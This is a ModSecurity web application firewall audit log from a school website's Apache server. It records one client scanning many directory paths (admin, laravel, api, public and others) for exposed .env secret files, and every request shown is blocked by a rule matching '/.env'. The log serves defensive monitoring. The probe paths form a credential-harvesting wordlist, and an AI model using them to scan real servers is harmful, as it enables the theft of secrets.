Stopwatch2: 1745151902343852 850; combined=311, p1=265, p2=0, p3=0, p4=0, p5=46, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--09cc063f-Z--
--a23a4c31-A--
[20/Apr/2025:19:25:02 +0700] aATnnlTf0pL9EQC7JDUZ1wAAAEk 103.236.140.4 38320 103.236.140.4 8181
--a23a4c31-B--
GET /sitemaps/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--a23a4c31-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a23a4c31-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902414833 766 (- - -)
Stopwatch2: 1745151902414833 766; combined=284, p1=248, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a23a4c31-Z--
--009fa32c-A--
[20/Apr/2025:19:25:02 +0700] aATnnlu16wJWB6g0mU8NoQAAABE 103.236.140.4 38322 103.236.140.4 8181
--009fa32c-B--
GET /site/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--009fa32c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--009fa32c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902485951 923 (- - -)
Stopwatch2: 1745151902485951 923; combined=395, p1=349, p2=0, p3=0, p4=0, p5=46, sr=148, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--009fa32c-Z--
--c0ef0745-A--
[20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr1QAAANU 103.236.140.4 38324 103.236.140.4 8181
--c0ef0745-B--
GET /admin/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--c0ef0745-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c0ef0745-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902565224 759 (- - -)
Stopwatch2: 1745151902565224 759; combined=271, p1=228, p2=0, p3=0, p4=0, p5=43, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c0ef0745-Z--
--cc5da622-A--
[20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr1gAAANI 103.236.140.4 38326 103.236.140.4 8181
--cc5da622-B--
GET /web/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--cc5da622-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cc5da622-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902638142 645 (- - -)
Stopwatch2: 1745151902638142 645; combined=260, p1=233, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cc5da622-Z--
--e5846232-A--
[20/Apr/2025:19:25:02 +0700] aATnnlu16wJWB6g0mU8NogAAAAA 103.236.140.4 38328 103.236.140.4 8181
--e5846232-B--
GET /public/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--e5846232-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e5846232-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902707868 732 (- - -)
Stopwatch2: 1745151902707868 732; combined=332, p1=222, p2=0, p3=0, p4=0, p5=110, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e5846232-Z--
--14cad354-A--
[20/Apr/2025:19:25:02 +0700] aATnnlu16wJWB6g0mU8NowAAABc 103.236.140.4 38330 103.236.140.4 8181
--14cad354-B--
GET /resources/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--14cad354-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--14cad354-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902778738 714 (- - -)
Stopwatch2: 1745151902778738 714; combined=266, p1=231, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--14cad354-Z--
--fa882275-A--
[20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr1wAAANM 103.236.140.4 38332 103.236.140.4 8181
--fa882275-B--
GET /sistema/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--fa882275-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fa882275-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902849086 739 (- - -)
Stopwatch2: 1745151902849086 739; combined=312, p1=276, p2=0, p3=0, p4=0, p5=36, sr=104, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fa882275-Z--
--2a765e66-A--
[20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr2AAAANA 103.236.140.4 38334 103.236.140.4 8181
--2a765e66-B--
GET /en/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--2a765e66-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2a765e66-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902921201 741 (- - -)
Stopwatch2: 1745151902921201 741; combined=326, p1=294, p2=0, p3=0, p4=0, p5=31, sr=115, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2a765e66-Z--
--349f071c-A--
[20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr2QAAAM8 103.236.140.4 38336 103.236.140.4 8181
--349f071c-B--
GET /tools/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--349f071c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--349f071c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151902995702 694 (- - -)
Stopwatch2: 1745151902995702 694; combined=257, p1=215, p2=0, p3=0, p4=0, p5=42, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--349f071c-Z--
--3c8a3448-A--
[20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr2gAAANY 103.236.140.4 38338 103.236.140.4 8181
--3c8a3448-B--
GET /clientes/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--3c8a3448-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3c8a3448-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151903070672 651 (- - -)
Stopwatch2: 1745151903070672 651; combined=246, p1=216, p2=0, p3=0, p4=0, p5=30, sr=63, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3c8a3448-Z--
--ce606672-A--
[20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr2wAAAMI 103.236.140.4 38340 103.236.140.4 8181
--ce606672-B--
GET /clientes/laravel_inbox/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--ce606672-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ce606672-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151903142362 721 (- - -)
Stopwatch2: 1745151903142362 721; combined=264, p1=221, p2=0, p3=0, p4=0, p5=42, sr=63, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ce606672-Z--
--6fb5b330-A--
[20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr3AAAAMM 103.236.140.4 38342 103.236.140.4 8181
--6fb5b330-B--
GET /clientes/laravel/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--6fb5b330-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6fb5b330-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151903216659 681 (- - -)
Stopwatch2: 1745151903216659 681; combined=290, p1=258, p2=0, p3=0, p4=0, p5=32, sr=103, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6fb5b330-Z--
--999ad00d-A--
[20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr3QAAANQ 103.236.140.4 38344 103.236.140.4 8181
--999ad00d-B--
GET /v1/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--999ad00d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--999ad00d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151903287517 652 (- - -)
Stopwatch2: 1745151903287517 652; combined=245, p1=213, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--999ad00d-Z--
--d7034f25-A--
[20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr3gAAAMo 103.236.140.4 38346 103.236.140.4 8181
--d7034f25-B--
GET /administrator/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--d7034f25-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d7034f25-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151903357846 774 (- - -)
Stopwatch2: 1745151903357846 774; combined=315, p1=283, p2=0, p3=0, p4=0, p5=32, sr=128, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d7034f25-Z--
--23ea1c7a-A--
[20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr3wAAAMA 103.236.140.4 38348 103.236.140.4 8181
--23ea1c7a-B--
GET /laravel/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--23ea1c7a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--23ea1c7a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151903428125 659 (- - -)
Stopwatch2: 1745151903428125 659; combined=269, p1=236, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--23ea1c7a-Z--
--ad8c5f22-A--
[20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr4AAAANc 103.236.140.4 38350 103.236.140.4 8181
--ad8c5f22-B--
GET /website/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--ad8c5f22-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ad8c5f22-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151903505110 662 (- - -)
Stopwatch2: 1745151903505110 662; combined=270, p1=237, p2=0, p3=0, p4=0, p5=32, sr=84, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ad8c5f22-Z--
--0ebf2708-A--
[20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr4QAAAMg 103.236.140.4 38352 103.236.140.4 8181
--0ebf2708-B--
GET /api/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--0ebf2708-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0ebf2708-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151903576982 769 (- - -)
Stopwatch2: 1745151903576982 769; combined=336, p1=292, p2=0, p3=0, p4=0, p5=44, sr=110, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0ebf2708-Z--
--77867956-A--
[20/Apr/2025:19:25:03 +0700] aATnn1u16wJWB6g0mU8NpAAAAA8 103.236.140.4 38354 103.236.140.4 8181
--77867956-B--
GET /local/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--77867956-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--77867956-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151903649936 631 (- - -)
Stopwatch2: 1745151903649936 631; combined=227, p1=197, p2=0, p3=0, p4=0, p5=29, sr=56, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--77867956-Z--
--3bcd5409-A--
[20/Apr/2025:19:25:03 +0700] aATnn0AzeWrUIk0gvAsr4gAAANE 103.236.140.4 38356 103.236.140.4 8181
--3bcd5409-B--
GET /home/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 159.89.175.215
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 159.89.175.215
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
--3bcd5409-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3bcd5409-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745151903721728 792 (- - -)
